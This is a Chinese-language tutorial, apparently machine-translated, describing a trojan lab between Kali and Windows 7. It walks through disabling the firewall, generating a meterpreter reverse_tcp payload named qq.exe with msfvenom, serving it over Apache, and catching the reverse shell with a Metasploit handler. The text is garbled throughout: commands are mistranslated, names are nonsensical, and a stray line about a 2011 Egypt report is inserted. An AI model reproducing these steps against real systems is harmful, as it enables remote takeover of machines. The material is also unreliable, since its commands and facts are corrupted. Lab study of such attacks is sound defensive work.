不能无视袭击Windows的最流行方式。因为它是袭击Windows最经常使用的技术的一个必要组成部分。他就是木马攻击,让我们从他的总结开始: 这是一个恶意代码, 伪装在正常过程中, 带有特定功能。是一种后门工具,具有独特的特征,如文件销毁和清除、密码传送、键盘记录和多斯攻击。它基本上是一个计算机黑客程序 允许远程计算机控制控制程序所在的计算机控制系统里应外合,受木马病毒感染的计算机已投入使用。典型的木马恶意软件搜索 计算机的后门入口。服务器除其他外,采用了被告PC的密码和关键文件。诸如声称的计算机间谍、篡改数据等非法行动可以完成Mujma病毒有很强的隐蔽性格根据黑客的目的 可能出乎意料地发动攻击
马匹的介绍到此结束,目前正在进行以下实验:
然后建立一个实验环境,由攻击机器(Kali)和目标机器(Win7)组成。
Kali的IP地址是:
目标win7 的 IP 地址 :
然后配置实验环境,启动 Windows 7 的 Windows 防火墙界面。并把它关闭。因为它会对实验结果产生影响所以建议关闭。接下来,我们将尝试在Windows 7上打Kali, 检查我们能否达到它。检查 kali ping win7 是否访问 。目的是确定这两个网络是否相互联系。可访问视图结果。
先制作一个木马,在kali中使用软件msfvenom制作输入命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.220.148 (攻击机IP)lport=4444(攻击机端口) -f exe > /root/qq.exe(后面是文件路径)。然后运行命令cp qq/var/ww/html。这是首次将木马软件转移到/var/ww/html子目录。查看是否有更多文件, 请在文件夹下的目录条目中输入 cd/ var/ ww/ html 。我发现了一些东西, html索引。 我不知道,ginxdebian.html 三个多余的文件,立即删除或以其他方式修改试验。因此,命令被输入.html索引。 此项目是我们特别报导的埃及抗争2011.html (删除不必要的文件)的一部分。然后输入命令/ etc/ init. d/ apache2 启动( Apache 启动), 然后输入命令/ etc/ init. d/ apache2 状态( 显示 Apache 进程 ) 。
攻击从命令 msfconole 进入kali 开始启动 msfconole, 然后键入命令开发/ 多/ 手( 开始监听) 。键入命令: 设置 payloadWindows/ meterprepter/ reverse_ tcp (反应倾听器), 然后按 Enter 键 。键入命令设置 LHOST( 可以返回到此计算机), 然后按 Enter 键 。要显示攻击模块, 请使用 LPORT 44( 音响端口号) 命令设置, 然后是命令显示选项 。开始攻击,使用命令运行。攻击已经结束,以便获得仪表仪。输入命令 shell 的力量 。为了避免误解 之后使用命令Chcp 437下次运行 Ip config 来确认测试结果 。
预防MUM病毒的三点战略如下:
1. 某些黑客,例如色情网站,本质上是危险的,有许多病毒和木马潜伏,用手机观看这些网站非常有害。
2. 虽然在互联网上有许多可下载计算机的检索系统,但许多病毒埋藏在这些资源中,因此用户必须检查下载网站的安全和可靠性,同时使用计算机下载资源,并尽量避免从个别网站下载。
3. 不阅读可疑的电子邮件请求;奇怪的邮件可能含有病毒,应立即删除,以避免木马病毒感染。
